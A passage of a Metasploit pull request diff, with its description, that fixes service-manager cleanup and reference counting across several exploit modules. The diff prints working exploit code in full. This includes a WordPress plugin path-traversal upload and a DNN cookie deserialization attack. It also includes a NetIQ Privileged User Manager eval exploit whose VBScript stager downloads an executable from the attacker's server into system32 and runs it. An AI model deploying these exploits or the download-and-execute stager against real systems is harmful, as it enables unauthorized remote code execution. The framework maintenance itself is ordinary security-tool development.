-      'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5),
-      'image_url' => payload_uri,
-      'image_user' => rand_text_alphanumeric(rand(5) + 5),
-      'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}"
-    }
+      random_file_name = rand_text_alphanumeric(rand(5) + 5)
+      post = {
+        'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5),
+        'image_url' => payload_uri,
+        'image_user' => rand_text_alphanumeric(rand(5) + 5),
+        'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}"
+      }
 
-    print_status("Uploading payload #{random_file_name}...")
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(wordpress_url_backend),
-      'vars_post' => post
-    })
+      print_status("Uploading payload #{random_file_name}...")
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(wordpress_url_backend),
+        'vars_post' => post
+      })
 
-    stop_service
+    ensure
+      cleanup_service
+    end
 
     unless res && res.code == 200 && res.headers['date']
       fail_with(Failure::Unknown, "#{peer} - Upload failed or unable to guess the system time...")

--- a/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb
+++ b/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb
@@ -73,7 +73,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => false,
         'DisclosureDate' => '2017-07-20',
         'DefaultOptions' => { 'WfsDelay' => 5 },
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
       )
     )
 
@@ -293,21 +298,23 @@ class MetasploitModule < Msf::Exploit::Remote
         print_warning('Trying all possible KEY and IV combinations...')
         print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...")
         start_service
-        vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
+        begin
+          vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
 
-        test_passphrases
+          test_passphrases
 
-        # If no working passphrase has been found,
-        # wait to allow the the chance for the last one to callback.
-        if @passphrase.empty? && !@dry_run
-          sleep(wfs_delay)
+          # If no working passphrase has been found,
+          # wait to allow the the chance for the last one to callback.
+          if @passphrase.empty? && !@dry_run
+            sleep(wfs_delay)
+          end
+        ensure
+          cleanup_service
         end
-        if service
-          stop_service
-        end
+
         print "\r\n"
         if !@passphrase.empty?
-          print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..-1]} found")
+          print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..]} found")
         end
       end
     end
@@ -446,7 +453,7 @@ Try setting target 4 and supply a file of of verification codes or specifiy vali
                         print_good("Possible Base Key Value Found: #{key}")
                       else
                         print_good("KEY Found: #{key}")
-                        print_good("IV Found: #{@passphrase[8..-1]}")
+                        print_good("IV Found: #{@passphrase[8..]}")
                       end
                       vprint_status(format('Total number of Keys tried: %<n_tried>d', n_tried: i))
                       vprint_status(format('Time to crack: %<c_time>.3f seconds', c_time: elapsed.to_s))
@@ -577,7 +584,7 @@ Try setting target 4 and supply a file of of verification codes or specifiy vali
     @decryptor.key = key
     found_pt = @decryptor.update(cipher_texts[0]) + @decryptor.final
     # Find all possible IVs for the first ciphertext
-    brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..-1])
+    brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..])
 
     # Reduce IV set by testing against other ciphertexts
     cipher_texts.drop(1).each do |cipher_text|

--- a/modules/exploits/windows/novell/netiq_pum_eval.rb
+++ b/modules/exploits/windows/novell/netiq_pum_eval.rb
@@ -198,109 +198,103 @@ class MetasploitModule < Msf::Exploit::Remote
         'Path' => resource_uri
       }
     })
-    begin
-      datastore['SSL'] = true
+    datastore['SSL'] = true
 
-      # http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/
-      vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5))
-      code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");"
-      code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-      code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-      code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-      code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-      code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-      code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-      code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-      code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-      code << "system(\"#{vbs_stage}.vbs\");"
-      register_file_for_cleanup("#{vbs_stage}.vbs")
-      register_file_for_cleanup("#{exename}.exe")
-      identity = ""
+    # http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/
+    vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5))
+    code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");"
+    code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+    code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+    code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+    code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+    code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+    code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+    code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+    code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+    code << "system(\"#{vbs_stage}.vbs\");"
+    register_file_for_cleanup("#{vbs_stage}.vbs")
+    register_file_for_cleanup("#{exename}.exe")
+    identity = ""
 
-      data = "\x00\x00\x00\x00\x00\x01"
-      data << "\x00\x14"
-      data << "SPF.Util.callModuleA"
-      data << "\x00\x00"
-      data << "\x00"
-      data << "\x00\x02"
-      data << "\x0a\x0a"
-      data << "\x00\x00\x00\x01\x03"
-      data << "\x00\x03"
-      data << "pkt"
-      data << "\x03"
-      data << "\x00\x06"
-      data << "method"
-      data << "\x02"
-      data << "\x00\x04"
-      data << "eval"
-      data << "\x00\x06"
-      data << "module"
-      data << "\x02"
-      data << "\x00\x08"
-      data << "ldapagnt"
-      data << "\x00\x04"
-      data << "Eval"
-      data << "\x03"
-      data << "\x00\x07"
-      data << "content"
-      data << "\x02"
-      data << [code.length + 4].pack("n")
-      data << code
-      data << "\x0a\x0a1;\x0a\x0a1;"
-      data << "\x00\x00\x09"
-      data << "\x00\x00\x09"
-      data << "\x00\x03"
-      data << "uid"
-      data << "\x02"
-      data << [identity.length].pack("n")
-      data << identity
-      data << "\x00\x00\x09"
-      data << "\x00\x08"
-      data << "svc_name"
-      data << "\x02"
-      data << [svc_name.length].pack("n")
-      data << svc_name
-      data << "\x00\x00\x09"
+    data = "\x00\x00\x00\x00\x00\x01"
+    data << "\x00\x14"
+    data << "SPF.Util.callModuleA"
+    data << "\x00\x00"
+    data << "\x00"
+    data << "\x00\x02"
+    data << "\x0a\x0a"
+    data << "\x00\x00\x00\x01\x03"
+    data << "\x00\x03"
+    data << "pkt"
+    data << "\x03"
+    data << "\x00\x06"
+    data << "method"
+    data << "\x02"
+    data << "\x00\x04"
+    data << "eval"
+    data << "\x00\x06"
+    data << "module"
+    data << "\x02"
+    data << "\x00\x08"
+    data << "ldapagnt"
+    data << "\x00\x04"
+    data << "Eval"
+    data << "\x03"
+    data << "\x00\x07"
+    data << "content"
+    data << "\x02"
+    data << [code.length + 4].pack("n")
+    data << code
+    data << "\x0a\x0a1;\x0a\x0a1;"
+    data << "\x00\x00\x09"
+    data << "\x00\x00\x09"
+    data << "\x00\x03"
+    data << "uid"
+    data << "\x02"
+    data << [identity.length].pack("n")
+    data << identity
+    data << "\x00\x00\x09"
+    data << "\x00\x08"
+    data << "svc_name"
+    data << "\x02"
+    data << [svc_name.length].pack("n")
+    data << svc_name
+    data << "\x00\x00\x09"
 
-      print_status("Sending the eval code request...")
+    print_status("Sending the eval code request...")
 
-      res = send_request_cgi(
-        {
-          'uri' => '/',
-          'version' => '1.1',
-          'method' => 'POST',
-          'ctype' => "application/x-amf",
-          'headers' => {
-            "x-flash-version" => "11,4,402,278"
-          },
-          'data' => data,
-        }
-      )
+    res = send_request_cgi(
+      {
+        'uri' => '/',
+        'version' => '1.1',
+        'method' => 'POST',
+        'ctype' => "application/x-amf",
+        'headers' => {
+          "x-flash-version" => "11,4,402,278"
+        },
+        'data' => data,
+      }
+    )
 
-      if res
-        fail_with(Failure::Unknown, "There was an unexpected response to the code eval request")
-      else
-        print_good("There wasn't a response, but this is the expected behavior...")
-      end
-
-      # wait for the data to be sent
-      print_status("Waiting for the victim to request the EXE payload...")
-
-      waited = 0
-      while (not @exe_sent)
-        select(nil, nil, nil, 1)
-        waited += 1
-        if (waited > datastore['HTTP_DELAY'])
-          fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")
-        end
-      end
-
-      print_status("Giving time to the payload to execute...")
-      select(nil, nil, nil, 20)
-
-    ensure
-      print_status("Shutting down the web service...")
-      cleanup_service
+    if res
+      fail_with(Failure::Unknown, "There was an unexpected response to the code eval request")
+    else
+      print_good("There wasn't a response, but this is the expected behavior...")
     end
+
+    # wait for the data to be sent
+    print_status("Waiting for the victim to request the EXE payload...")
+
+    waited = 0
+    while (not @exe_sent)
+      select(nil, nil, nil, 1)
+      waited += 1
+      if (waited > datastore['HTTP_DELAY'])
+        fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")
+      end
+    end
+
+    print_status("Giving time to the payload to execute...")
+    select(nil, nil, nil, 20)
   end
 end

--- a/modules/exploits/windows/novell/netiq_pum_eval.rb
+++ b/modules/exploits/windows/novell/netiq_pum_eval.rb
@@ -198,106 +198,109 @@ class MetasploitModule < Msf::Exploit::Remote
         'Path' => resource_uri
       }
     })
-    datastore['SSL'] = true
+    begin
+      datastore['SSL'] = true
 
-    # http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/
-    vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5))
-    code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");"
-    code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-    code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-    code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-    code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-    code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-    code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-    code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-    code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-    code << "system(\"#{vbs_stage}.vbs\");"
-    register_file_for_cleanup("#{vbs_stage}.vbs")
-    register_file_for_cleanup("#{exename}.exe")
-    identity = ""
+      # http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/
+      vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5))
+      code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");"
+      code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+      code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+      code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+      code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+      code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+      code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+      code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+      code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+      code << "system(\"#{vbs_stage}.vbs\");"
+      register_file_for_cleanup("#{vbs_stage}.vbs")
+      register_file_for_cleanup("#{exename}.exe")
+      identity = ""
 
-    data = "\x00\x00\x00\x00\x00\x01"
-    data << "\x00\x14"
-    data << "SPF.Util.callModuleA"
-    data << "\x00\x00"
-    data << "\x00"
-    data << "\x00\x02"
-    data << "\x0a\x0a"
-    data << "\x00\x00\x00\x01\x03"
-    data << "\x00\x03"
-    data << "pkt"
-    data << "\x03"
-    data << "\x00\x06"
-    data << "method"
-    data << "\x02"
-    data << "\x00\x04"
-    data << "eval"
-    data << "\x00\x06"
-    data << "module"
-    data << "\x02"
-    data << "\x00\x08"
-    data << "ldapagnt"
-    data << "\x00\x04"
-    data << "Eval"
-    data << "\x03"
-    data << "\x00\x07"
-    data << "content"
-    data << "\x02"
-    data << [code.length + 4].pack("n")
-    data << code
-    data << "\x0a\x0a1;\x0a\x0a1;"
-    data << "\x00\x00\x09"
-    data << "\x00\x00\x09"
-    data << "\x00\x03"
-    data << "uid"
-    data << "\x02"
-    data << [identity.length].pack("n")
-    data << identity
-    data << "\x00\x00\x09"
-    data << "\x00\x08"
-    data << "svc_name"
-    data << "\x02"
-    data << [svc_name.length].pack("n")
-    data << svc_name
-    data << "\x00\x00\x09"
+      data = "\x00\x00\x00\x00\x00\x01"
+      data << "\x00\x14"
+      data << "SPF.Util.callModuleA"
+      data << "\x00\x00"
+      data << "\x00"
+      data << "\x00\x02"
+      data << "\x0a\x0a"
+      data << "\x00\x00\x00\x01\x03"
+      data << "\x00\x03"
+      data << "pkt"
+      data << "\x03"
+      data << "\x00\x06"
+      data << "method"
+      data << "\x02"
+      data << "\x00\x04"
+      data << "eval"
+      data << "\x00\x06"
+      data << "module"
+      data << "\x02"
+      data << "\x00\x08"
+      data << "ldapagnt"
+      data << "\x00\x04"
+      data << "Eval"
+      data << "\x03"
+      data << "\x00\x07"
+      data << "content"
+      data << "\x02"
+      data << [code.length + 4].pack("n")
+      data << code
+      data << "\x0a\x0a1;\x0a\x0a1;"
+      data << "\x00\x00\x09"
+      data << "\x00\x00\x09"
+      data << "\x00\x03"
+      data << "uid"
+      data << "\x02"
+      data << [identity.length].pack("n")
+      data << identity
+      data << "\x00\x00\x09"
+      data << "\x00\x08"
+      data << "svc_name"
+      data << "\x02"
+      data << [svc_name.length].pack("n")
+      data << svc_name
+      data << "\x00\x00\x09"
 
-    print_status("Sending the eval code request...")
+      print_status("Sending the eval code request...")
 
-    res = send_request_cgi(
-      {
-        'uri' => '/',
-        'version' => '1.1',
-        'method' => 'POST',
-        'ctype' => "application/x-amf",
-        'headers' => {
-          "x-flash-version" => "11,4,402,278"
-        },
-        'data' => data,
-      }
-    )
+      res = send_request_cgi(
+        {
+          'uri' => '/',
+          'version' => '1.1',
+          'method' => 'POST',
+          'ctype' => "application/x-amf",
+          'headers' => {
+            "x-flash-version" => "11,4,402,278"
+          },
+          'data' => data,
+        }
+      )
 
-    if res
-      fail_with(Failure::Unknown, "There was an unexpected response to the code eval request")
-    else
-      print_good("There wasn't a response, but this is the expected behavior...")
-    end
-
-    # wait for the data to be sent
-    print_status("Waiting for the victim to request the EXE payload...")
-
-    waited = 0
-    while (not @exe_sent)
-      select(nil, nil, nil, 1)
-      waited += 1
-      if (waited > datastore['HTTP_DELAY'])
-        fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")
+      if res
+        fail_with(Failure::Unknown, "There was an unexpected response to the code eval request")
+      else
+        print_good("There wasn't a response, but this is the expected behavior...")
       end
+
+      # wait for the data to be sent
+      print_status("Waiting for the victim to request the EXE payload...")
+
+      waited = 0
+      while (not @exe_sent)
+        select(nil, nil, nil, 1)
+        waited += 1
+        if (waited > datastore['HTTP_DELAY'])
+          fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")
+        end
+      end
+
+      print_status("Giving time to the payload to execute...")
+      select(nil, nil, nil, 20)
+
+    ensure
+      print_status("Shutting down the web service...")
+      cleanup_service
     end
-
-    print_status("Giving time to the payload to execute...")
-    select(nil, nil, nil, 20)
-
-    print_status("Shutting down the web service...")
-    stop_service
   end
 end


### PR DESCRIPTION
This resolves several edge-case bugs in the service manager. I've grouped them together into one issue because the fixes are in some cases overlapping, and it seems better to test the entire feature at once given all the changes to it.

Bug 1: Communication channel not respected in service manager #16314

- [ ]  Run an HTTP handler with the same settings (0.0.0.0 and the same port) locally, and on a remote session using ReverseListenerComm. Verify that listeners are started both locally, and via the remote session.
- [ ] Run an HTTP handler with the same settings (0.0.0.0 and the same port) on two separate remote sessions using ReverseListenerComm. Verify that listeners are started via both remote sessions.

Bug 2: Socket leak: HTTP service not dereferenced #16315

Verify the following:

- `use exploit/multi/handler`
- `set payload linux/x64/meterpreter_reverse_http`
- `set lport 8080`
- `set lhost 0.0.0.0`
- `run -j`
- Verify: netstat should show port 8080 open
- `set luri abc`
- `run -j`
- Verify: Should launch a new handler; should not complain about "the port is already open"

Bug 3: String key collision

The service manager attempts to find existing services based on a string-concatenated key of important properties (i.e. IP, port number). No delimiter was placed between the port and the host, so Port 123 on host 45.6.7.8 would be treated the same as port 1234 on host 5.6.7.8, and the service. I can't think of a situation that it's likely to happen (given that it actually needs to bind to that IP), but it's definitely a logic error. You can probably just verify this with a code review.

Bug 4: Modules don't use reference counting

The modules `exploit/multi/misc/java_rmi_server` and `exploit/osx/browser/safari_file_policy` call `stop` on the service directly, rather than respecting reference counting. As a result, any other services running at the same time as them on the same port will be killed by these modules.